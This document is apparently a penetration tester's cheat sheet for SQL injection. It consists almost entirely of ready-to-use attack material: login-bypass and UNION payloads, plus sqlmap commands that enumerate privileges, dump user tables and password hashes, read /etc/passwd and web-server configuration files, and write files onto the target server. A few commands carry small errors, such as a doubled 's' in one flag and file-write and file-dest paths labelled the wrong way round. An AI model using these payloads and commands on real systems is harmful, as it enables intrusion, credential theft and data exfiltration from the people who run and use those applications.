10 - SQL Injection

# Simple SQL Injection Payloads for Testing ```bash #Example SQLi payloads admin' admin'-- - admin' OR 1=1 admin' OR 1=1-- - #Example UNION payloads test' UNION SELECT 1,2;-- - #suss out number of columns test' UNION SELECT 1,2,2,3,4,5,6;-- - test' UNION SELECT 1,@@version,2,3,4,5,6;-- - #once we determine the number of columns, determine the injectable column test' ORDER BY 1-- #suss out number of columns test' ORDER BY 2-- test' ORDER BY 3-- ``` --- # Enumeration with `sqlmap` ## HTTP GET Requests ```bash sqlmap -u '(http://www.example.com/' --data 'uid=1&name=test' --batch ``` - Once we know which parameter is injectable, we can specify the injection point for efficiency ```bash sqlmap -u 'http://www.example.com/' --data 'uid=1*&name=test' --batch ``` ## HTTP POST Requests - Copy POST request to file using `burp` or Mozilla dev tools ```bash sqlmap -r request.txt --batch --force-ssl ``` ## Enumerate current db and user info ```bash sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 --privilege --current-db --is-dba --banner --batch sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 --users --passwords ``` ## Attempt to read critical files ```bash sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 --file-read=/etc/passwd --batch #output may be in HEX sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 --file-read=/etc/apache2/apache2.conf --batch #Debian installs sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 --file-read=/etc/apache2/sites-available/000-default.conf --batch sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 --file-read=/etc/nginx/nginx.conf --batch sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 --file-read=/etc/nginx/sites-enabled/default --batch sqlmap -r request.txt --force-sssl --dbms=mssql --technique=S --risk=3 --level=5 --file-read=C:\inetpub\wwwroot\web.config ``` ## Enumerate common files to read ```bash sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 --common-files --batch ``` ## Attempt to write files ```bash sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 --file-write=/remote/path --file-dest=/local/path --batch ``` ## Enumerate dbs & schema ```bash sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 --dbs --schema --batch ``` ## Enumerate tables & columns ```bash sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 -D TARGET-DB --tables --batch sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 -D TARGET-DB -T TARGET_TABLE --columns --batch ``` ## Dump tables ```bash sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 -D TARGET-DB -T TARGET_TABLE --dump --batch sqlmap -r request.txt --dbms=mysql --technique=BEU --risk=3 --level=5 -D TARGET-DB -T TARGET_TABLE -C user,password --dump --batch ```